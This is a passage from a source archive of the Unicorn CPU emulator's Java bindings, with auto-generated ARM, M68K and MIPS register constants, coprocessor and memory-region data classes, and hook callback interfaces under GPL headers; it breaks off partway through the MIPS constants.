SYSL */ public class Arm64_CP { public int crn, crm, op0, op1, op2; public long val; public Arm64_CP(int crn, int crm, int op0, int op1, int op2) { this(crn, crm, op0, op1, op2, 0); } public Arm64_CP(int crn, int crm, int op0, int op1, int op2, long val) { this.crn = crn; this.crm = crm; this.op0 = op0; this.op1 = op1; this.op2 = op2; this.val = val; } @Override public String toString() { return "Arm64_CP [crn=" + crn + ", crm=" + crm + ", op0=" + op0 + ", op1=" + op1 + ", op2=" + op2 + ", val=" + val + "]"; } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/ArmConst.java000066400000000000000000000223241467524106700244270ustar00rootroot00000000000000// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface ArmConst { // ARM CPU public static final int UC_CPU_ARM_926 = 0; public static final int UC_CPU_ARM_946 = 1; public static final int UC_CPU_ARM_1026 = 2; public static final int UC_CPU_ARM_1136_R2 = 3; public static final int UC_CPU_ARM_1136 = 4; public static final int UC_CPU_ARM_1176 = 5; public static final int UC_CPU_ARM_11MPCORE = 6; public static final int UC_CPU_ARM_CORTEX_M0 = 7; public static final int UC_CPU_ARM_CORTEX_M3 = 8; public static final int UC_CPU_ARM_CORTEX_M4 = 9; public static final int UC_CPU_ARM_CORTEX_M7 = 10; public static final int UC_CPU_ARM_CORTEX_M33 = 11; public static final int UC_CPU_ARM_CORTEX_R5 = 12; public static final int UC_CPU_ARM_CORTEX_R5F = 13; public static final int UC_CPU_ARM_CORTEX_A7 = 14; public static final int UC_CPU_ARM_CORTEX_A8 = 15; public static final int UC_CPU_ARM_CORTEX_A9 = 16; public static final int UC_CPU_ARM_CORTEX_A15 = 17; public static final int UC_CPU_ARM_TI925T = 18; public static final int UC_CPU_ARM_SA1100 = 19; public static final int UC_CPU_ARM_SA1110 = 20; public static final int UC_CPU_ARM_PXA250 = 21; public static final int UC_CPU_ARM_PXA255 = 22; public static final int UC_CPU_ARM_PXA260 = 23; public static final int UC_CPU_ARM_PXA261 = 24; public static final int UC_CPU_ARM_PXA262 = 25; public static final int UC_CPU_ARM_PXA270 = 26; public static final int UC_CPU_ARM_PXA270A0 = 27; public static final int UC_CPU_ARM_PXA270A1 = 28; public static final int UC_CPU_ARM_PXA270B0 = 29; public static final int UC_CPU_ARM_PXA270B1 = 30; public static final int UC_CPU_ARM_PXA270C0 = 31; public static final int UC_CPU_ARM_PXA270C5 = 32; public static final int UC_CPU_ARM_MAX = 33; public static final int UC_CPU_ARM_ENDING = 34; // ARM registers public static final int UC_ARM_REG_INVALID = 0; public static final int UC_ARM_REG_APSR = 1; public static final int UC_ARM_REG_APSR_NZCV = 2; public static final int UC_ARM_REG_CPSR = 3; public static final int UC_ARM_REG_FPEXC = 4; public static final int UC_ARM_REG_FPINST = 5; public static final int UC_ARM_REG_FPSCR = 6; public static final int UC_ARM_REG_FPSCR_NZCV = 7; public static final int UC_ARM_REG_FPSID = 8; public static final int UC_ARM_REG_ITSTATE = 9; public static final int UC_ARM_REG_LR = 10; public static final int UC_ARM_REG_PC = 11; public static final int UC_ARM_REG_SP = 12; public static final int UC_ARM_REG_SPSR = 13; public static final int UC_ARM_REG_D0 = 14; public static final int UC_ARM_REG_D1 = 15; public static final int UC_ARM_REG_D2 = 16; public static final int UC_ARM_REG_D3 = 17; public static final int UC_ARM_REG_D4 = 18; public static final int UC_ARM_REG_D5 = 19; public static final int UC_ARM_REG_D6 = 20; public static final int UC_ARM_REG_D7 = 21; public static final int UC_ARM_REG_D8 = 22; public static final int UC_ARM_REG_D9 = 23; public static final int UC_ARM_REG_D10 = 24; public static final int UC_ARM_REG_D11 = 25; public static final int UC_ARM_REG_D12 = 26; public static final int UC_ARM_REG_D13 = 27; public static final int UC_ARM_REG_D14 = 28; public static final int UC_ARM_REG_D15 = 29; public static final int UC_ARM_REG_D16 = 30; public static final int UC_ARM_REG_D17 = 31; public static final int UC_ARM_REG_D18 = 32; public static final int UC_ARM_REG_D19 = 33; public static final int UC_ARM_REG_D20 = 34; public static final int UC_ARM_REG_D21 = 35; public static final int UC_ARM_REG_D22 = 36; public static final int UC_ARM_REG_D23 = 37; public static final 
int UC_ARM_REG_D24 = 38; public static final int UC_ARM_REG_D25 = 39; public static final int UC_ARM_REG_D26 = 40; public static final int UC_ARM_REG_D27 = 41; public static final int UC_ARM_REG_D28 = 42; public static final int UC_ARM_REG_D29 = 43; public static final int UC_ARM_REG_D30 = 44; public static final int UC_ARM_REG_D31 = 45; public static final int UC_ARM_REG_FPINST2 = 46; public static final int UC_ARM_REG_MVFR0 = 47; public static final int UC_ARM_REG_MVFR1 = 48; public static final int UC_ARM_REG_MVFR2 = 49; public static final int UC_ARM_REG_Q0 = 50; public static final int UC_ARM_REG_Q1 = 51; public static final int UC_ARM_REG_Q2 = 52; public static final int UC_ARM_REG_Q3 = 53; public static final int UC_ARM_REG_Q4 = 54; public static final int UC_ARM_REG_Q5 = 55; public static final int UC_ARM_REG_Q6 = 56; public static final int UC_ARM_REG_Q7 = 57; public static final int UC_ARM_REG_Q8 = 58; public static final int UC_ARM_REG_Q9 = 59; public static final int UC_ARM_REG_Q10 = 60; public static final int UC_ARM_REG_Q11 = 61; public static final int UC_ARM_REG_Q12 = 62; public static final int UC_ARM_REG_Q13 = 63; public static final int UC_ARM_REG_Q14 = 64; public static final int UC_ARM_REG_Q15 = 65; public static final int UC_ARM_REG_R0 = 66; public static final int UC_ARM_REG_R1 = 67; public static final int UC_ARM_REG_R2 = 68; public static final int UC_ARM_REG_R3 = 69; public static final int UC_ARM_REG_R4 = 70; public static final int UC_ARM_REG_R5 = 71; public static final int UC_ARM_REG_R6 = 72; public static final int UC_ARM_REG_R7 = 73; public static final int UC_ARM_REG_R8 = 74; public static final int UC_ARM_REG_R9 = 75; public static final int UC_ARM_REG_R10 = 76; public static final int UC_ARM_REG_R11 = 77; public static final int UC_ARM_REG_R12 = 78; public static final int UC_ARM_REG_S0 = 79; public static final int UC_ARM_REG_S1 = 80; public static final int UC_ARM_REG_S2 = 81; public static final int UC_ARM_REG_S3 = 82; public static final int UC_ARM_REG_S4 = 83; public static final int UC_ARM_REG_S5 = 84; public static final int UC_ARM_REG_S6 = 85; public static final int UC_ARM_REG_S7 = 86; public static final int UC_ARM_REG_S8 = 87; public static final int UC_ARM_REG_S9 = 88; public static final int UC_ARM_REG_S10 = 89; public static final int UC_ARM_REG_S11 = 90; public static final int UC_ARM_REG_S12 = 91; public static final int UC_ARM_REG_S13 = 92; public static final int UC_ARM_REG_S14 = 93; public static final int UC_ARM_REG_S15 = 94; public static final int UC_ARM_REG_S16 = 95; public static final int UC_ARM_REG_S17 = 96; public static final int UC_ARM_REG_S18 = 97; public static final int UC_ARM_REG_S19 = 98; public static final int UC_ARM_REG_S20 = 99; public static final int UC_ARM_REG_S21 = 100; public static final int UC_ARM_REG_S22 = 101; public static final int UC_ARM_REG_S23 = 102; public static final int UC_ARM_REG_S24 = 103; public static final int UC_ARM_REG_S25 = 104; public static final int UC_ARM_REG_S26 = 105; public static final int UC_ARM_REG_S27 = 106; public static final int UC_ARM_REG_S28 = 107; public static final int UC_ARM_REG_S29 = 108; public static final int UC_ARM_REG_S30 = 109; public static final int UC_ARM_REG_S31 = 110; public static final int UC_ARM_REG_C1_C0_2 = 111; public static final int UC_ARM_REG_C13_C0_2 = 112; public static final int UC_ARM_REG_C13_C0_3 = 113; public static final int UC_ARM_REG_IPSR = 114; public static final int UC_ARM_REG_MSP = 115; public static final int UC_ARM_REG_PSP = 116; public 
static final int UC_ARM_REG_CONTROL = 117; public static final int UC_ARM_REG_IAPSR = 118; public static final int UC_ARM_REG_EAPSR = 119; public static final int UC_ARM_REG_XPSR = 120; public static final int UC_ARM_REG_EPSR = 121; public static final int UC_ARM_REG_IEPSR = 122; public static final int UC_ARM_REG_PRIMASK = 123; public static final int UC_ARM_REG_BASEPRI = 124; public static final int UC_ARM_REG_BASEPRI_MAX = 125; public static final int UC_ARM_REG_FAULTMASK = 126; public static final int UC_ARM_REG_APSR_NZCVQ = 127; public static final int UC_ARM_REG_APSR_G = 128; public static final int UC_ARM_REG_APSR_NZCVQG = 129; public static final int UC_ARM_REG_IAPSR_NZCVQ = 130; public static final int UC_ARM_REG_IAPSR_G = 131; public static final int UC_ARM_REG_IAPSR_NZCVQG = 132; public static final int UC_ARM_REG_EAPSR_NZCVQ = 133; public static final int UC_ARM_REG_EAPSR_G = 134; public static final int UC_ARM_REG_EAPSR_NZCVQG = 135; public static final int UC_ARM_REG_XPSR_NZCVQ = 136; public static final int UC_ARM_REG_XPSR_G = 137; public static final int UC_ARM_REG_XPSR_NZCVQG = 138; public static final int UC_ARM_REG_CP_REG = 139; public static final int UC_ARM_REG_ENDING = 140; // alias registers public static final int UC_ARM_REG_R13 = 12; public static final int UC_ARM_REG_R14 = 10; public static final int UC_ARM_REG_R15 = 11; public static final int UC_ARM_REG_SB = 75; public static final int UC_ARM_REG_SL = 76; public static final int UC_ARM_REG_FP = 77; public static final int UC_ARM_REG_IP = 78; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Arm_CP.java000066400000000000000000000015621467524106700240030ustar00rootroot00000000000000package unicorn; /** ARM coprocessor register for MRC, MCR, MRRC, MCRR */ public class Arm_CP { public int cp, is64, sec, crn, crm, opc1, opc2; public long val; public Arm_CP(int cp, int is64, int sec, int crn, int crm, int opc1, int opc2) { this(cp, is64, sec, crn, crm, opc1, opc2, 0); } public Arm_CP(int cp, int is64, int sec, int crn, int crm, int opc1, int opc2, long val) { this.cp = cp; this.is64 = is64; this.sec = sec; this.crn = crn; this.crm = crm; this.opc1 = opc1; this.opc2 = opc2; this.val = val; } @Override public String toString() { return "Arm_CP [cp=" + cp + ", is64=" + is64 + ", sec=" + sec + ", crn=" + crn + ", crm=" + crm + ", opc1=" + opc1 + ", opc2=" + opc2 + ", val=" + val + "]"; } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/BlockHook.java000066400000000000000000000022671467524106700245600ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_BLOCK} */ public interface BlockHook extends Hook { /** Called on each basic block within the hooked range. 
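* <p>A minimal usage sketch (illustrative only: it assumes an existing
* {@code Unicorn} instance {@code uc} and the
* {@code hook_add(BlockHook, long begin, long end, Object user)} overload;
* passing begin &gt; end hooks all addresses):
* <pre>{@code
* uc.hook_add((BlockHook) (engine, address, size, user) -> {
*     // Log every basic block as it is entered.
*     System.out.printf("basic block at 0x%x, %d bytes%n", address, size);
* }, 1, 0, null);
* }</pre>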
* * @param u {@link Unicorn} instance firing this hook * @param address address of the first instruction in the block * @param size size of the block, in bytes * @param user user data provided when registering this hook */ public void hook(Unicorn u, long address, int size, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/CodeHook.java000066400000000000000000000022501467524106700243700ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_CODE} */ public interface CodeHook extends Hook { /** Called on each instruction within the hooked range. * * @param u {@link Unicorn} instance firing this hook * @param address address of the instruction * @param size size of the instruction, in bytes * @param user user data provided when registering this hook */ public void hook(Unicorn u, long address, int size, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/CpuidHook.java000066400000000000000000000022761467524106700245720ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN} with {@code UC_X86_INS_CPUID} */ public interface CpuidHook extends InstructionHook { /** Called to handle an x86 CPUID instruction. * * @param u {@link Unicorn} instance firing this hook * @param user user data provided when registering this hook * @return 1 to skip the instruction (marking it as handled), * 0 to let QEMU handle it */ public int hook(Unicorn u, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/EdgeGeneratedHook.java000066400000000000000000000023661467524106700262110ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_EDGE_GENERATED} */ public interface EdgeGeneratedHook extends Hook { /** Called whenever a jump is made to a new (untranslated) basic block. * * @param u {@link Unicorn} instance firing this hook * @param cur_tb newly translated block being entered * @param prev_tb previous block being exited * @param user user data provided when registering this hook */ public void hook(Unicorn u, TranslationBlock cur_tb, TranslationBlock prev_tb, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/EventMemHook.java000066400000000000000000000034201467524106700252360ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_MEM_INVALID} * (UC_HOOK_MEM_{READ,WRITE,FETCH}_{UNMAPPED,PROT}) */ public interface EventMemHook extends Hook { /** Called when an invalid memory access occurs within the registered * range. * * @param u {@link Unicorn} instance firing this hook * @param type type of the memory access and violation: one of * UC_MEM_{READ,WRITE,FETCH}_{UNMAPPED,PROT} * @param address address of the memory access * @param size size of the memory access * @param value value written ({@code UC_MEM_WRITE_*} only) * @param user user data provided when registering this hook * @return {@code true} to mark the exception as handled, which * will retry the memory access. If no hooks return * {@code true}, the memory access will fail and a CPU * exception will be raised. */ public boolean hook(Unicorn u, int type, long address, int size, long value, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Hook.java000066400000000000000000000014341467524106700236000ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/ package unicorn; /** Base interface for all Unicorn hooks */ public interface Hook { } unicorn-2.1.1/bindings/java/src/main/java/unicorn/InHook.java000066400000000000000000000023441467524106700240700ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN} with {@code UC_X86_INS_IN} */ public interface InHook extends InstructionHook { /** Called to handle an x86 IN instruction. * * @param u {@link Unicorn} instance firing this hook * @param port I/O port number * @param size size of the request (1, 2, or 4 bytes) * @param user user data provided when registering this hook * @return value of the I/O request */ public int hook(Unicorn u, int port, int size, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/InstructionHook.java000066400000000000000000000014751467524106700260470ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Base interface for {@code UC_HOOK_INSN} hooks */ public interface InstructionHook extends Hook { } unicorn-2.1.1/bindings/java/src/main/java/unicorn/InterruptHook.java000066400000000000000000000021331467524106700255120ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INTR} */ public interface InterruptHook extends Hook { /** Called when a CPU interrupt occurs. 
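* <p>A minimal usage sketch (illustrative only: it assumes an existing
* x86 {@code Unicorn} instance {@code uc}, the
* {@code hook_add(InterruptHook, long begin, long end, Object user)}
* overload, and a {@code reg_read} method returning the register value as a
* {@code long}; on x86 Linux, {@code int 0x80} raises interrupt number 0x80):
* <pre>{@code
* uc.hook_add((InterruptHook) (engine, intno, user) -> {
*     if (intno == 0x80) {
*         // Report the system call number held in EAX.
*         System.out.printf("syscall %d%n",
*             engine.reg_read(X86Const.UC_X86_REG_EAX));
*     }
* }, 1, 0, null);
* }</pre>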
* * @param u {@link Unicorn} instance firing this hook * @param intno CPU-specific interrupt number * @param user user data provided when registering this hook */ public void hook(Unicorn u, int intno, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/InvalidInstructionHook.java000066400000000000000000000025271467524106700273550ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN_INVALID} */ public interface InvalidInstructionHook extends Hook { /** Called when an invalid instruction is encountered. * * @param u {@link Unicorn} instance firing this hook * @param user user data provided when registering this hook * @return {@code true} to mark the exception as handled. Emulation * will stop without raising an invalid instruction exception. * If no hooks return {@code true}, emulation will stop with * an invalid instruction exception. */ public boolean hook(Unicorn u, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/M68kConst.java000066400000000000000000000031521467524106700244330ustar00rootroot00000000000000// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface M68kConst { // M68K CPU public static final int UC_CPU_M68K_M5206 = 0; public static final int UC_CPU_M68K_M68000 = 1; public static final int UC_CPU_M68K_M68020 = 2; public static final int UC_CPU_M68K_M68030 = 3; public static final int UC_CPU_M68K_M68040 = 4; public static final int UC_CPU_M68K_M68060 = 5; public static final int UC_CPU_M68K_M5208 = 6; public static final int UC_CPU_M68K_CFV4E = 7; public static final int UC_CPU_M68K_ANY = 8; public static final int UC_CPU_M68K_ENDING = 9; // M68K registers public static final int UC_M68K_REG_INVALID = 0; public static final int UC_M68K_REG_A0 = 1; public static final int UC_M68K_REG_A1 = 2; public static final int UC_M68K_REG_A2 = 3; public static final int UC_M68K_REG_A3 = 4; public static final int UC_M68K_REG_A4 = 5; public static final int UC_M68K_REG_A5 = 6; public static final int UC_M68K_REG_A6 = 7; public static final int UC_M68K_REG_A7 = 8; public static final int UC_M68K_REG_D0 = 9; public static final int UC_M68K_REG_D1 = 10; public static final int UC_M68K_REG_D2 = 11; public static final int UC_M68K_REG_D3 = 12; public static final int UC_M68K_REG_D4 = 13; public static final int UC_M68K_REG_D5 = 14; public static final int UC_M68K_REG_D6 = 15; public static final int UC_M68K_REG_D7 = 16; public static final int UC_M68K_REG_SR = 17; public static final int UC_M68K_REG_PC = 18; public static final int UC_M68K_REG_ENDING = 19; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MemHook.java000066400000000000000000000032171467524106700242400ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_MEM_VALID} * (UC_HOOK_MEM_{READ,WRITE,FETCH} and/or * {@code UC_HOOK_MEM_READ_AFTER}) */ public interface MemHook extends Hook { /** Called when a valid memory access occurs within the registered range. * * @param u {@link Unicorn} instance firing this hook * @param type type of the memory access: one of {@code UC_MEM_READ}, * {@code UC_MEM_WRITE} or {@code UC_MEM_READ_AFTER}. * @param address address of the memory access * @param size size of the memory access * @param value value read ({@code UC_MEM_READ_AFTER} only) or written * ({@code UC_MEM_WRITE} only). Not meaningful for * {@code UC_MEM_READ} events. * @param user user data provided when registering this hook */ public void hook(Unicorn u, int type, long address, int size, long value, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MemRegion.java000066400000000000000000000021401467524106700245550ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2016 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; public class MemRegion { public long begin; public long end; public int perms; public MemRegion(long begin, long end, int perms) { this.begin = begin; this.end = end; this.perms = perms; } @Override public String toString() { return String.format("MemRegion [begin=0x%x, end=0x%x, perms=%d]", begin, end, perms); } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MipsConst.java000066400000000000000000000256001467524106700246200ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface MipsConst { // MIPS32 CPUS public static final int UC_CPU_MIPS32_4KC = 0; public static final int UC_CPU_MIPS32_4KM = 1; public static final int UC_CPU_MIPS32_4KECR1 = 2; public static final int UC_CPU_MIPS32_4KEMR1 = 3; public static final int UC_CPU_MIPS32_4KEC = 4; public static final int UC_CPU_MIPS32_4KEM = 5; public static final int UC_CPU_MIPS32_24KC = 6; public static final int UC_CPU_MIPS32_24KEC = 7; public static final int UC_CPU_MIPS32_24KF = 8; public static final int UC_CPU_MIPS32_34KF = 9; public static final int UC_CPU_MIPS32_74KF = 10; public static final int UC_CPU_MIPS32_M14K = 11; public static final int UC_CPU_MIPS32_M14KC = 12; public static final int UC_CPU_MIPS32_P5600 = 13; public static final int UC_CPU_MIPS32_MIPS32R6_GENERIC = 14; public static final int UC_CPU_MIPS32_I7200 = 15; public static final int UC_CPU_MIPS32_ENDING = 16; // MIPS64 CPUS public static final int UC_CPU_MIPS64_R4000 = 0; public static final int UC_CPU_MIPS64_VR5432 = 1; public static final int UC_CPU_MIPS64_5KC = 2; public static final int UC_CPU_MIPS64_5KF = 3; public static final int UC_CPU_MIPS64_20KC = 4; public static final int UC_CPU_MIPS64_MIPS64R2_GENERIC = 5; public static final int UC_CPU_MIPS64_5KEC = 6; public static final int UC_CPU_MIPS64_5KEF = 7; public static final int UC_CPU_MIPS64_I6400 = 8; public static final int UC_CPU_MIPS64_I6500 = 9; public static final int UC_CPU_MIPS64_LOONGSON_2E = 10; public static final int UC_CPU_MIPS64_LOONGSON_2F = 11; public static final int UC_CPU_MIPS64_MIPS64DSPR2 = 12; public static final int UC_CPU_MIPS64_ENDING = 13; // MIPS registers public static final int UC_MIPS_REG_INVALID = 0; // General purpose registers public static final int UC_MIPS_REG_PC = 1; public static final int UC_MIPS_REG_0 = 2; public static final int UC_MIPS_REG_1 = 3; public static final int UC_MIPS_REG_2 = 4; public static final int UC_MIPS_REG_3 = 5; public static final int UC_MIPS_REG_4 = 6; public static final int UC_MIPS_REG_5 = 7; public static final int UC_MIPS_REG_6 = 8; public static final int UC_MIPS_REG_7 = 9; public static final int UC_MIPS_REG_8 = 10; public static final int UC_MIPS_REG_9 = 11; public static final int UC_MIPS_REG_10 = 12; public static final int UC_MIPS_REG_11 = 13; public static final int UC_MIPS_REG_12 = 14; public static final int UC_MIPS_REG_13 = 15; public static final int UC_MIPS_REG_14 = 16; public static final int UC_MIPS_REG_15 = 17; public static final int UC_MIPS_REG_16 = 18; public static final int UC_MIPS_REG_17 = 19; public static 
final int UC_MIPS_REG_18 = 20; public static final int UC_MIPS_REG_19 = 21; public static final int UC_MIPS_REG_20 = 22; public static final int UC_MIPS_REG_21 = 23; public static final int UC_MIPS_REG_22 = 24; public static final int UC_MIPS_REG_23 = 25; public static final int UC_MIPS_REG_24 = 26; public static final int UC_MIPS_REG_25 = 27; public static final int UC_MIPS_REG_26 = 28; public static final int UC_MIPS_REG_27 = 29; public static final int UC_MIPS_REG_28 = 30; public static final int UC_MIPS_REG_29 = 31; public static final int UC_MIPS_REG_30 = 32; public static final int UC_MIPS_REG_31 = 33; // DSP registers public static final int UC_MIPS_REG_DSPCCOND = 34; public static final int UC_MIPS_REG_DSPCARRY = 35; public static final int UC_MIPS_REG_DSPEFI = 36; public static final int UC_MIPS_REG_DSPOUTFLAG = 37; public static final int UC_MIPS_REG_DSPOUTFLAG16_19 = 38; public static final int UC_MIPS_REG_DSPOUTFLAG20 = 39; public static final int UC_MIPS_REG_DSPOUTFLAG21 = 40; public static final int UC_MIPS_REG_DSPOUTFLAG22 = 41; public static final int UC_MIPS_REG_DSPOUTFLAG23 = 42; public static final int UC_MIPS_REG_DSPPOS = 43; public static final int UC_MIPS_REG_DSPSCOUNT = 44; // ACC registers public static final int UC_MIPS_REG_AC0 = 45; public static final int UC_MIPS_REG_AC1 = 46; public static final int UC_MIPS_REG_AC2 = 47; public static final int UC_MIPS_REG_AC3 = 48; // COP registers public static final int UC_MIPS_REG_CC0 = 49; public static final int UC_MIPS_REG_CC1 = 50; public static final int UC_MIPS_REG_CC2 = 51; public static final int UC_MIPS_REG_CC3 = 52; public static final int UC_MIPS_REG_CC4 = 53; public static final int UC_MIPS_REG_CC5 = 54; public static final int UC_MIPS_REG_CC6 = 55; public static final int UC_MIPS_REG_CC7 = 56; // FPU registers public static final int UC_MIPS_REG_F0 = 57; public static final int UC_MIPS_REG_F1 = 58; public static final int UC_MIPS_REG_F2 = 59; public static final int UC_MIPS_REG_F3 = 60; public static final int UC_MIPS_REG_F4 = 61; public static final int UC_MIPS_REG_F5 = 62; public static final int UC_MIPS_REG_F6 = 63; public static final int UC_MIPS_REG_F7 = 64; public static final int UC_MIPS_REG_F8 = 65; public static final int UC_MIPS_REG_F9 = 66; public static final int UC_MIPS_REG_F10 = 67; public static final int UC_MIPS_REG_F11 = 68; public static final int UC_MIPS_REG_F12 = 69; public static final int UC_MIPS_REG_F13 = 70; public static final int UC_MIPS_REG_F14 = 71; public static final int UC_MIPS_REG_F15 = 72; public static final int UC_MIPS_REG_F16 = 73; public static final int UC_MIPS_REG_F17 = 74; public static final int UC_MIPS_REG_F18 = 75; public static final int UC_MIPS_REG_F19 = 76; public static final int UC_MIPS_REG_F20 = 77; public static final int UC_MIPS_REG_F21 = 78; public static final int UC_MIPS_REG_F22 = 79; public static final int UC_MIPS_REG_F23 = 80; public static final int UC_MIPS_REG_F24 = 81; public static final int 